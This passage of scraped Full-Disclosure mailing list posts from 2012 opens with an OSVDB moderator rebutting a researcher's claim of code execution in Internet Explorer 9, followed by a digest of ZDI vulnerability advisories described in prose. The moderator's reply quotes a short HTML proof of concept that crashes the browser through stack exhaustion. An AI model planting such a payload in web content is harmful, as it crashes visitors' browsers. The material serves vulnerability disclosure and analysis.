To: <a href="mailto:&#100;&#117;&#107;&#107;&#104;&#97;&#64;&#83;&#97;&#102;&#101;&#45;&#109;&#97;&#105;&#108;&#46;&#110;&#101;&#116;">&#100;&#117;&#107;&#107;&#104;&#97;&#64;&#83;&#97;&#102;&#101;&#45;&#109;&#97;&#105;&#108;&#46;&#110;&#101;&#116;</a><br />
Cc: <a href="mailto:&#109;&#111;&#100;&#101;&#114;&#97;&#116;&#111;&#114;&#115;&#64;&#111;&#115;&#118;&#100;&#98;&#46;&#111;&#114;&#103;">&#109;&#111;&#100;&#101;&#114;&#97;&#116;&#111;&#114;&#115;&#64;&#111;&#115;&#118;&#100;&#98;&#46;&#111;&#114;&#103;</a><br />
Date: Fri, 21 Dec 2012 04:32:31 -0600 (CST)<br />
Subject: Re: [OSVDB Mods] Fwd: Internet Explorer Stack Exhaustion -&gt; Flag<br />
     [MSIE9]<br />
<br />
<br />
On Fri, 21 Dec 2012, <a href="mailto:&#100;&#117;&#107;&#107;&#104;&#97;&#64;&#83;&#97;&#102;&#101;&#45;&#109;&#97;&#105;&#108;&#46;&#110;&#101;&#116;">&#100;&#117;&#107;&#107;&#104;&#97;&#64;&#83;&#97;&#102;&#101;&#45;&#109;&#97;&#105;&#108;&#46;&#110;&#101;&#116;</a> wrote:<br />
<br />
: regarding to this vulnerability:<br />
:<br />
: [<a href="http://osvdb.org/show/osvdb/88539"  rel="nofollow">osvdb.org</a>]<br />
:<br />
: Why has this been flagged as &quot;myth/fake&quot;?<br />
<br />
Because your claims of code execution are wrong.<br />
<br />
: Paste the payload in a file, save it as &quot;test.html&quot; and run it in Internet Explorer:<br />
:<br />
: &lt;table&gt;&lt;/for xmlns=&quot;1&quot;&gt;<br />
: &lt;td&gt;&lt;datetime&gt;&lt;colgroup&gt;<br />
: &lt;id&gt;&lt;dd&gt;&lt;col&gt;<br />
: &lt;/table&gt;&lt;object&gt;<br />
: &lt;hr&gt;&lt;base&gt;<br />
:<br />
: It will cause a crash.<br />
<br />
Yes, it will cause a crash.<br />
<br />
: Use a debugger, you will see this is a stack exhaustion.<br />
<br />
Yes, stack exhaustion leads to a crash.<br />
<br />
: Also, if you have any basic knowledge, take a look at the registers (ESP<br />
: 003FDDD4 = Stack Exhaustion). There is no myth and no fake. I would like<br />
: to receive a statement why this has been flagged. If there is no reason,<br />
: please remove the message that this is a &quot;myth/fake&quot;.<br />
<br />
Our official statement:<br />
<br />
You claimed code execution in your post. In case you forgot, let me<br />
remind and clarify:<br />
<br />
[<a href="http://seclists.org/bugtraq/2012/Dec/109"  rel="nofollow">seclists.org</a>]<br />
&quot;Successful exploitation may lead to arbitrary code execution.&quot;<br />
<br />
This is inaccurate. Thus, we have flagged the entry &quot;Myth/Fake&quot; because<br />
stack exhaustion leads to a crash, not code execution. There is a<br />
difference between a stack overflow (exhaustion) that crashes, and a<br />
stack-based buffer overflow that *may* lead to code execution. You have<br />
only proven stack exhaustion and a random crash. This is a common mistake<br />
among new &quot;researchers&quot;.<br />
<br />
Your mail to us now about stack exhaustion is different than your initial<br />
post to Full-Disclosure. Your post to F-D was a) lacking relevant details<br />
to make sense of b) very different than your email to us. You need to<br />
figure out what details you think you found out, and stick to them.<br />
Posting apples and mailing us claiming aardvarks doesn't fly sir.<br />
<br />
You said in your F-D post, &quot;The application is prone to a remote stack<br />
overflow vulnerability.&quot; which makes anyone immediately reading it believe<br />
it's a stack-based buffer overflow - especially since you claim it &quot;may<br />
lead to arbitrary code execution&quot;. Your PoC does not demonstrate anything<br />
other than a straightforward crash (a stack overflow exception -<br />
0xc00000fd).<br />
<br />
Further, you titled this &quot;Microsoft Internet Explorer 9.x &lt;= Remote Stack<br />
Overflow Vulnerability&quot;. I am giving you the benefit of the doubt and<br />
assuming you are claiming this in version 9.x, and not implying &quot;less than<br />
or equal to 9.x&quot;. But just in case, did you even bother to test on<br />
multiple versions of 9.x? If so, why didn't you specify the exact version?<br />
Did you test before that and notice that MSIE 8 appears to crash, while<br />
MSIE 6 and 7 do not? I mean seriously, listing 9.x without any more<br />
details is amateur hour. I won't even get into the fact that you did not<br />
mention patches, or platform.<br />
<br />
If you feel that we are wrong, consider one of the replies to your post:<br />
<br />
[<a href="http://seclists.org/bugtraq/2012/Dec/119"  rel="nofollow">seclists.org</a>]<br />
<br />
   From: Fabio Baroni &lt;fabiothebest () gmail com&gt;<br />
   Date: Thu, 20 Dec 2012 01:05:07 +0100<br />
<br />
   Jonathan Ness from the Microsoft Security Response Center says this<br />
   IE9 POC is stack exhaustion, not a stack-based buffer overflow and<br />
   Stack exhaustion is typically not exploitable for code execution.<br />
<br />
That is now two people that dispute your finding, yet you seem to think<br />
you know more than anyone while only posting the most pedestrian of<br />
advisories. While you can cry that you want to read Ness' statement,<br />
remember that you have published NOTHING other than a simple crash. You<br />
have not demonstrated anything else, and certainly not demonstrated code<br />
execution.<br />
<br />
You said to us, &quot;Also, if you have any basic knowledge...&quot;, I would like<br />
to say that I believe OSVDB staff have more than basic knowledge. However,<br />
based on your F-D post, you don't get access to our reversing ninja. Based<br />
on the crap you posted, you only get access to me and my guinea pigs.<br />
Waffle and Tater aren't that good at reversing, but they can usually smell<br />
suspicious bullshit, as demonstrated when I try to hand feed them a<br />
vegetable in a desperate ploy to grab one for &quot;mandatory pet time&quot;. Until<br />
you show that YOU have basic knowledge, you only get to deal with two<br />
guinea pigs and a washed up, bitter ex-penetration tester. For now, the<br />
entry remains Myth/Fake.<br />
<br />
The easiest way for you to get us to change our entry, is for you to a)<br />
demonstrate code execution or b) get the vendor to admit code execution is<br />
possible. If you can demonstrate code execution off this particular bug, I<br />
will Paypal you US$250 just for proving me wrong.<br />
<br />
Jericho<br />
<br />
p.s. Our database has 87510 entries, and only 401 are marked as Myth/Fake.<br />
Congrats, for making the very few!<br />
<br />
_______________________________________________<br />
Full-Disclosure - We believe in it.<br />
Charter: [<a href="http://lists.grok.org.uk/full-disclosure-charter.html"  rel="nofollow">lists.grok.org.uk</a>]<br />
Hosted and sponsored by Secunia - [<a href="http://secunia.com/"  rel="nofollow">secunia.com</a>]]]></description>
            <dc:creator>security curmudgeon</dc:creator>
            <category>Full-Disclosure</category>
            <pubDate>Sat, 22 Dec 2012 00:18:38 +0800</pubDate>
        </item>
        <item>
            <guid>http://choon.net/forum/read.php?23,1688185,1688185#msg-1688185</guid>
            <title>Re: [Full-disclosure] ZDI Anything (1 reply)</title>
            <link>http://choon.net/forum/read.php?23,1688185,1688185#msg-1688185</link>
            <description><![CDATA[ Ah, more of the one-third disclosures, or somewhat-disclosed-but-not-really disclosure best of breed pony parade i see. Does nobody else find their posts tedious and annoying? I prefer mustlive any day<br />
<br />
<br />
On 12/21/12 4:43 AM <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#45;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#45;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a> wrote:<br />
<br />
Send Full-Disclosure mailing list submissions to<br />
<br />
<a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
<br />
<br />
To subscribe or unsubscribe via the World Wide Web, visit<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
or, via email, send a message with subject or body 'help' to<br />
<br />
<a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
<br />
<br />
You can reach the person managing the list at<br />
<br />
<a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
<br />
<br />
When replying, please edit your Subject line so it is more specific<br />
than &quot;Re: Contents of Full-Disclosure digest...&quot;<br />
<br />
<br />
<br />
Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.<br />
<br />
<br />
<br />
Today's Topics:<br />
<br />
<br />
1. ZDI-12-188 : Microsoft Internet Explorer OnRowsInserted Event<br />
Remote Code Execution Vulnerability (ZDI Disclosures)<br />
2. ZDI-12-189 : Oracle Java WebStart Changing System Properties<br />
Remote Code Execution Vulnerability (ZDI Disclosures)<br />
3. ZDI-12-190 : Microsoft Internet Explorer Title Element Change<br />
Remote Code Execution Vulnerability (ZDI Disclosures)<br />
4. ZDI-12-191 : Webkit HTMLMedia Element beforeLoad Remote Code<br />
Execution Vulnerability (ZDI Disclosures)<br />
5. ZDI-12-192 : Microsoft Internet Explorer insertRow Remote<br />
Code Execution Vulnerability (ZDI Disclosures)<br />
6. ZDI-12-193 : Microsoft Internet Explorer insertAdjacentText<br />
Remote Code Execution Vulnerability (ZDI Disclosures)<br />
7. ZDI-12-194 : Microsoft Internet Explorer OnBeforeDeactivate<br />
Event Remote Code Execution Vulnerability (ZDI Disclosures)<br />
8. ZDI-12-195 : RealNetworks RealPlayer ATRAC Sample Decoding<br />
Remote Code Execution Vulnerability (ZDI Disclosures)<br />
9. ZDI-12-196 : Novell Groupwise GWIA ber_get_stringa Remote<br />
Code Execution Vulnerability (ZDI Disclosures)<br />
10. ZDI-12-197 : Oracle Java java.beans.Statement Remote Code<br />
Execution Vulnerability (ZDI Disclosures)<br />
<br />
<br />
----------------------------------------------------------------------<br />
<br />
<br />
Message: 1<br />
Date: Fri, 21 Dec 2012 06:29:33 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-188 : Microsoft Internet Explorer<br />
OnRowsInserted Event Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;<br />
Cc: <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-188 : Microsoft Internet Explorer OnRowsInserted Event Remote Code<br />
Execution Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2012-1881<br />
<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
<br />
- -- Affected Vendors:<br />
Microsoft<br />
<br />
<br />
- -- Affected Products:<br />
Microsoft Internet Explorer<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Microsoft Internet Explorer. User interaction<br />
is required to exploit this vulnerability in that the target must visit a<br />
malicious page or open a malicious file.<br />
<br />
<br />
The specific flaw exists within the way Internet Explorer handles<br />
'onrowsinserted' callback functions for certain elements. It is possible to<br />
alter the document DOM tree in a onrowsinserted callback function which can<br />
lead to a use-after-free condition when the function returns. This can<br />
result in remote code execution under the context of the current process.<br />
<br />
<br />
- -- Vendor Response:<br />
Microsoft states:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-03-14 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Anonymous<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRWElVtgMGTo1scAQLRbQgAqGyxowWyS6ENL3tdOoUpU3QxweD2KGcW<br />
rrYxmRKfZxIOw8dtXe/CPLw+ANGLy8y0IfMD2JAgTwqigzjOsLvxXJx77827jjkZ<br />
D5FvAe4CWWXSiQQlN7b+VKDldvqH18FPSMSiKW+nAX5Pi6RwnK7xMdq4f/fyj1tu<br />
0f/N271a4PB83wICFJT8GbB3xM2CEObMs5sEYd3GAF6i0snn9DZGHF+PVdaqmFXD<br />
scBVoqVHGW2EeePeRkGWaVJIGG2b4kV0vzFoIXeyZ5e24cJ5fmeTQPsPOtcVDRec<br />
eA6WqHdWSRGWPYSjTU3AQUTfaVdzXZmTFet4VvtO0/a6Qq3aPDh/PQ==<br />
=EDil<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
<br />
Message: 2<br />
Date: Fri, 21 Dec 2012 06:31:01 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-189 : Oracle Java WebStart Changing<br />
System Properties Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;, <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-189 : Oracle Java WebStart Changing System Properties Remote Code<br />
Execution Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2012-1721<br />
<br />
<br />
- -- CVSS:<br />
9, AV:N/AC:L/Au:N/C:P/I:P/A:C<br />
<br />
<br />
- -- Affected Vendors:<br />
Oracle<br />
<br />
<br />
- -- Affected Products:<br />
Oracle Java Runtime<br />
<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Oracle Java. User interaction is required to<br />
exploit this vulnerability in that the target must visit a malicious page<br />
or open a malicious file.<br />
<br />
<br />
The specific flaw exists because it is possible to change system properties<br />
through trusted JNLP files. If a JNLP file requests &quot;&lt;all-permissions/&gt;&quot;<br />
and only references signed, trusted JAR files, it can set all System<br />
properties. By referencing a trusted JNLP file from an untrusted one it is<br />
possible to change System Properties that can lead to remote code execution<br />
under the context of the current user.<br />
<br />
<br />
<br />
- -- Vendor Response:<br />
Oracle has issued an update to correct this vulnerability. More details can<br />
be found at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
ml<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-03-14 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Chris Ries<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRWf1VtgMGTo1scAQL17Af+PLKQVLcU5Y6zbxi8z9zDy8lZV/qhycKN<br />
nSRaC5SOh+aVBVN3hvRc8LkRpD1me4kWLk5uvfP4dV9yZToRCt1dZOvIFBgJOYdd<br />
ztiOTFgQCGapxv4bdvI9VRvx9bUzO8Rl2k3L32xV1gLpe9UKiQbJw5qC8SbhYqWY<br />
8j4JA03/66hyTZqT+M6tWKtB80P2lCuYp4aoF6kcIn//5tyS4h0RgPWRTaxzmBcU<br />
p6V2m3rxDpaTyPRZxN7Q9c8JvN3ClWla1gcNdYAFsh7bnYgiOeI4cvk0vY6v312s<br />
+3gKQKsU2w+Its1gekAIEk11tlyR3SRtd/mFnk4fEzvlhkSjytAvgQ==<br />
=VL7/<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
<br />
Message: 3<br />
Date: Fri, 21 Dec 2012 06:32:34 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-190 : Microsoft Internet Explorer<br />
Title Element Change Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;, <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-190 : Microsoft Internet Explorer Title Element Change Remote Code<br />
Execution Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2012-1877<br />
<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
<br />
- -- Affected Vendors:<br />
Microsoft<br />
<br />
<br />
- -- Affected Products:<br />
Microsoft Internet Explorer 9<br />
<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 12385.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Microsoft Internet Explorer. User interaction<br />
is required to exploit this vulnerability in that the target must visit a<br />
malicious page or open a malicious file.<br />
<br />
<br />
The specific flaw exists in the 'onpropertychange' user callback function<br />
for the document.title. If the function changes the document in the<br />
callback function by using, for example, a document.write call, this can<br />
result in a use-after-free vulnerability. This can lead to remote code<br />
execution under the context of the program.<br />
<br />
<br />
- -- Vendor Response:<br />
Microsoft has issued an update to correct this vulnerability. More details<br />
can be found at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
<br />
- -- Disclosure Timeline:<br />
2012-03-14 - Vulnerability reported to vendor<br />
2012-12-21 - Coordinated public release of advisory<br />
<br />
<br />
- -- Credit:<br />
This vulnerability was discovered by:<br />
* Anonymous<br />
<br />
<br />
- -- About the Zero Day Initiative (ZDI):<br />
Established by TippingPoint, The Zero Day Initiative (ZDI) represents<br />
a best-of-breed model for rewarding security researchers for responsibly<br />
disclosing discovered vulnerabilities.<br />
<br />
<br />
Researchers interested in getting paid for their security research<br />
through the ZDI can find more information and sign-up at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
The ZDI is unique in how the acquired vulnerability information is<br />
used. TippingPoint does not re-sell the vulnerability details or any<br />
exploit code. Instead, upon notifying the affected product vendor,<br />
TippingPoint provides its customers with zero day protection through<br />
its intrusion prevention technology. Explicit details regarding the<br />
specifics of the vulnerability are not exposed to any parties until<br />
an official vendor patch is publicly available. Furthermore, with the<br />
altruistic aim of helping to secure a broader user base, TippingPoint<br />
provides this vulnerability information confidentially to security<br />
vendors (including competitors) who have a vulnerability protection or<br />
mitigation product.<br />
<br />
<br />
Our vulnerability disclosure policy is available online at:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
Follow the ZDI on Twitter:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
-----BEGIN PGP SIGNATURE-----<br />
Version: PGP Desktop 10.2.0 (Build 1950)<br />
Charset: utf-8<br />
<br />
<br />
wsBVAwUBUNRW21VtgMGTo1scAQKc7gf+OEjWyyQYkCYucuwZivLId/up2Px3MbYR<br />
omQMFCjxijYj0rx77RRQGBcPC8ROhW6Gt9VEA+C86gi1hynG/zTEz+AA6iRxJVfp<br />
6fUmWVL119kh6tcQml4Mz49vjz1tV9zaALpK/jv7V1EuQ7nS5oSbAi4H0M9oXmLX<br />
Fht71iOmiFvrnWj+rSZOYJ7Ctd2+DHLGrR72kYEgtU2SLm3cGgJqiEHbbjq/Y7J6<br />
Ba2Y8mHEJKvdpx3012zJ7BrU0ZOUKRhiiibtJj1A+KAX5fwc+TS5mGMGXgTY/WVe<br />
sr7diAuRz+R1Uuv1n8ieiV3SuUNcy7NmPlvsXa4VJQsEvB7I9QQIXA==<br />
=aqcy<br />
-----END PGP SIGNATURE-----<br />
<br />
<br />
-------------- next part --------------<br />
An HTML attachment was scrubbed...<br />
URL: [<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>] <br />
<br />
------------------------------<br />
<br />
<br />
Message: 4<br />
Date: Fri, 21 Dec 2012 06:34:41 -0600<br />
From: ZDI Disclosures &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Subject: [Full-disclosure] ZDI-12-191 : Webkit HTMLMedia Element<br />
beforeLoad Remote Code Execution Vulnerability<br />
To: Full Disclosure &lt;full-disclosure@lists.grok.org.uk&gt;, BugTraq<br />
&lt;full-disclosure@lists.grok.org.uk&gt;, <a href="mailto:&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;">&#102;&#117;&#108;&#108;&#45;&#100;&#105;&#115;&#99;&#108;&#111;&#115;&#117;&#114;&#101;&#64;&#108;&#105;&#115;&#116;&#115;&#46;&#103;&#114;&#111;&#107;&#46;&#111;&#114;&#103;&#46;&#117;&#107;</a><br />
Message-ID: &lt;full-disclosure@lists.grok.org.uk&gt;<br />
Content-Type: text/plain; charset=&quot;iso-8859-1&quot;<br />
<br />
<br />
-----BEGIN PGP SIGNED MESSAGE-----<br />
Hash: SHA1<br />
<br />
<br />
ZDI-12-191 : Webkit HTMLMedia Element beforeLoad Remote Code Execution<br />
Vulnerability<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
December 21, 2012<br />
<br />
<br />
- -- CVE ID:<br />
CVE-2011-3071<br />
<br />
<br />
- -- CVSS:<br />
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P<br />
<br />
<br />
- -- Affected Vendors:<br />
WebKit.Org<br />
<br />
<br />
<br />
- -- Affected Products:<br />
WebKit.Org WebKit<br />
<br />
<br />
- -- TippingPoint(TM) IPS Customer Protection:<br />
TippingPoint IPS customers have been protected against this<br />
vulnerability by Digital Vaccine protection filter ID 12492.<br />
For further product information on the TippingPoint IPS, visit:<br />
<br />
[<a href="https://lists.grok.org.uk/mailman/listinfo/full-disclosure"  rel="nofollow">lists.grok.org.uk</a>]<br />
<br />
<br />
- -- Vulnerability Details:<br />
This vulnerability allows remote attackers to execute arbitrary code on<br />
vulnerable installations of Apple Safari Webkit. User interaction is<br />
required to exploit this vulnerability in that the target must visit a<br />
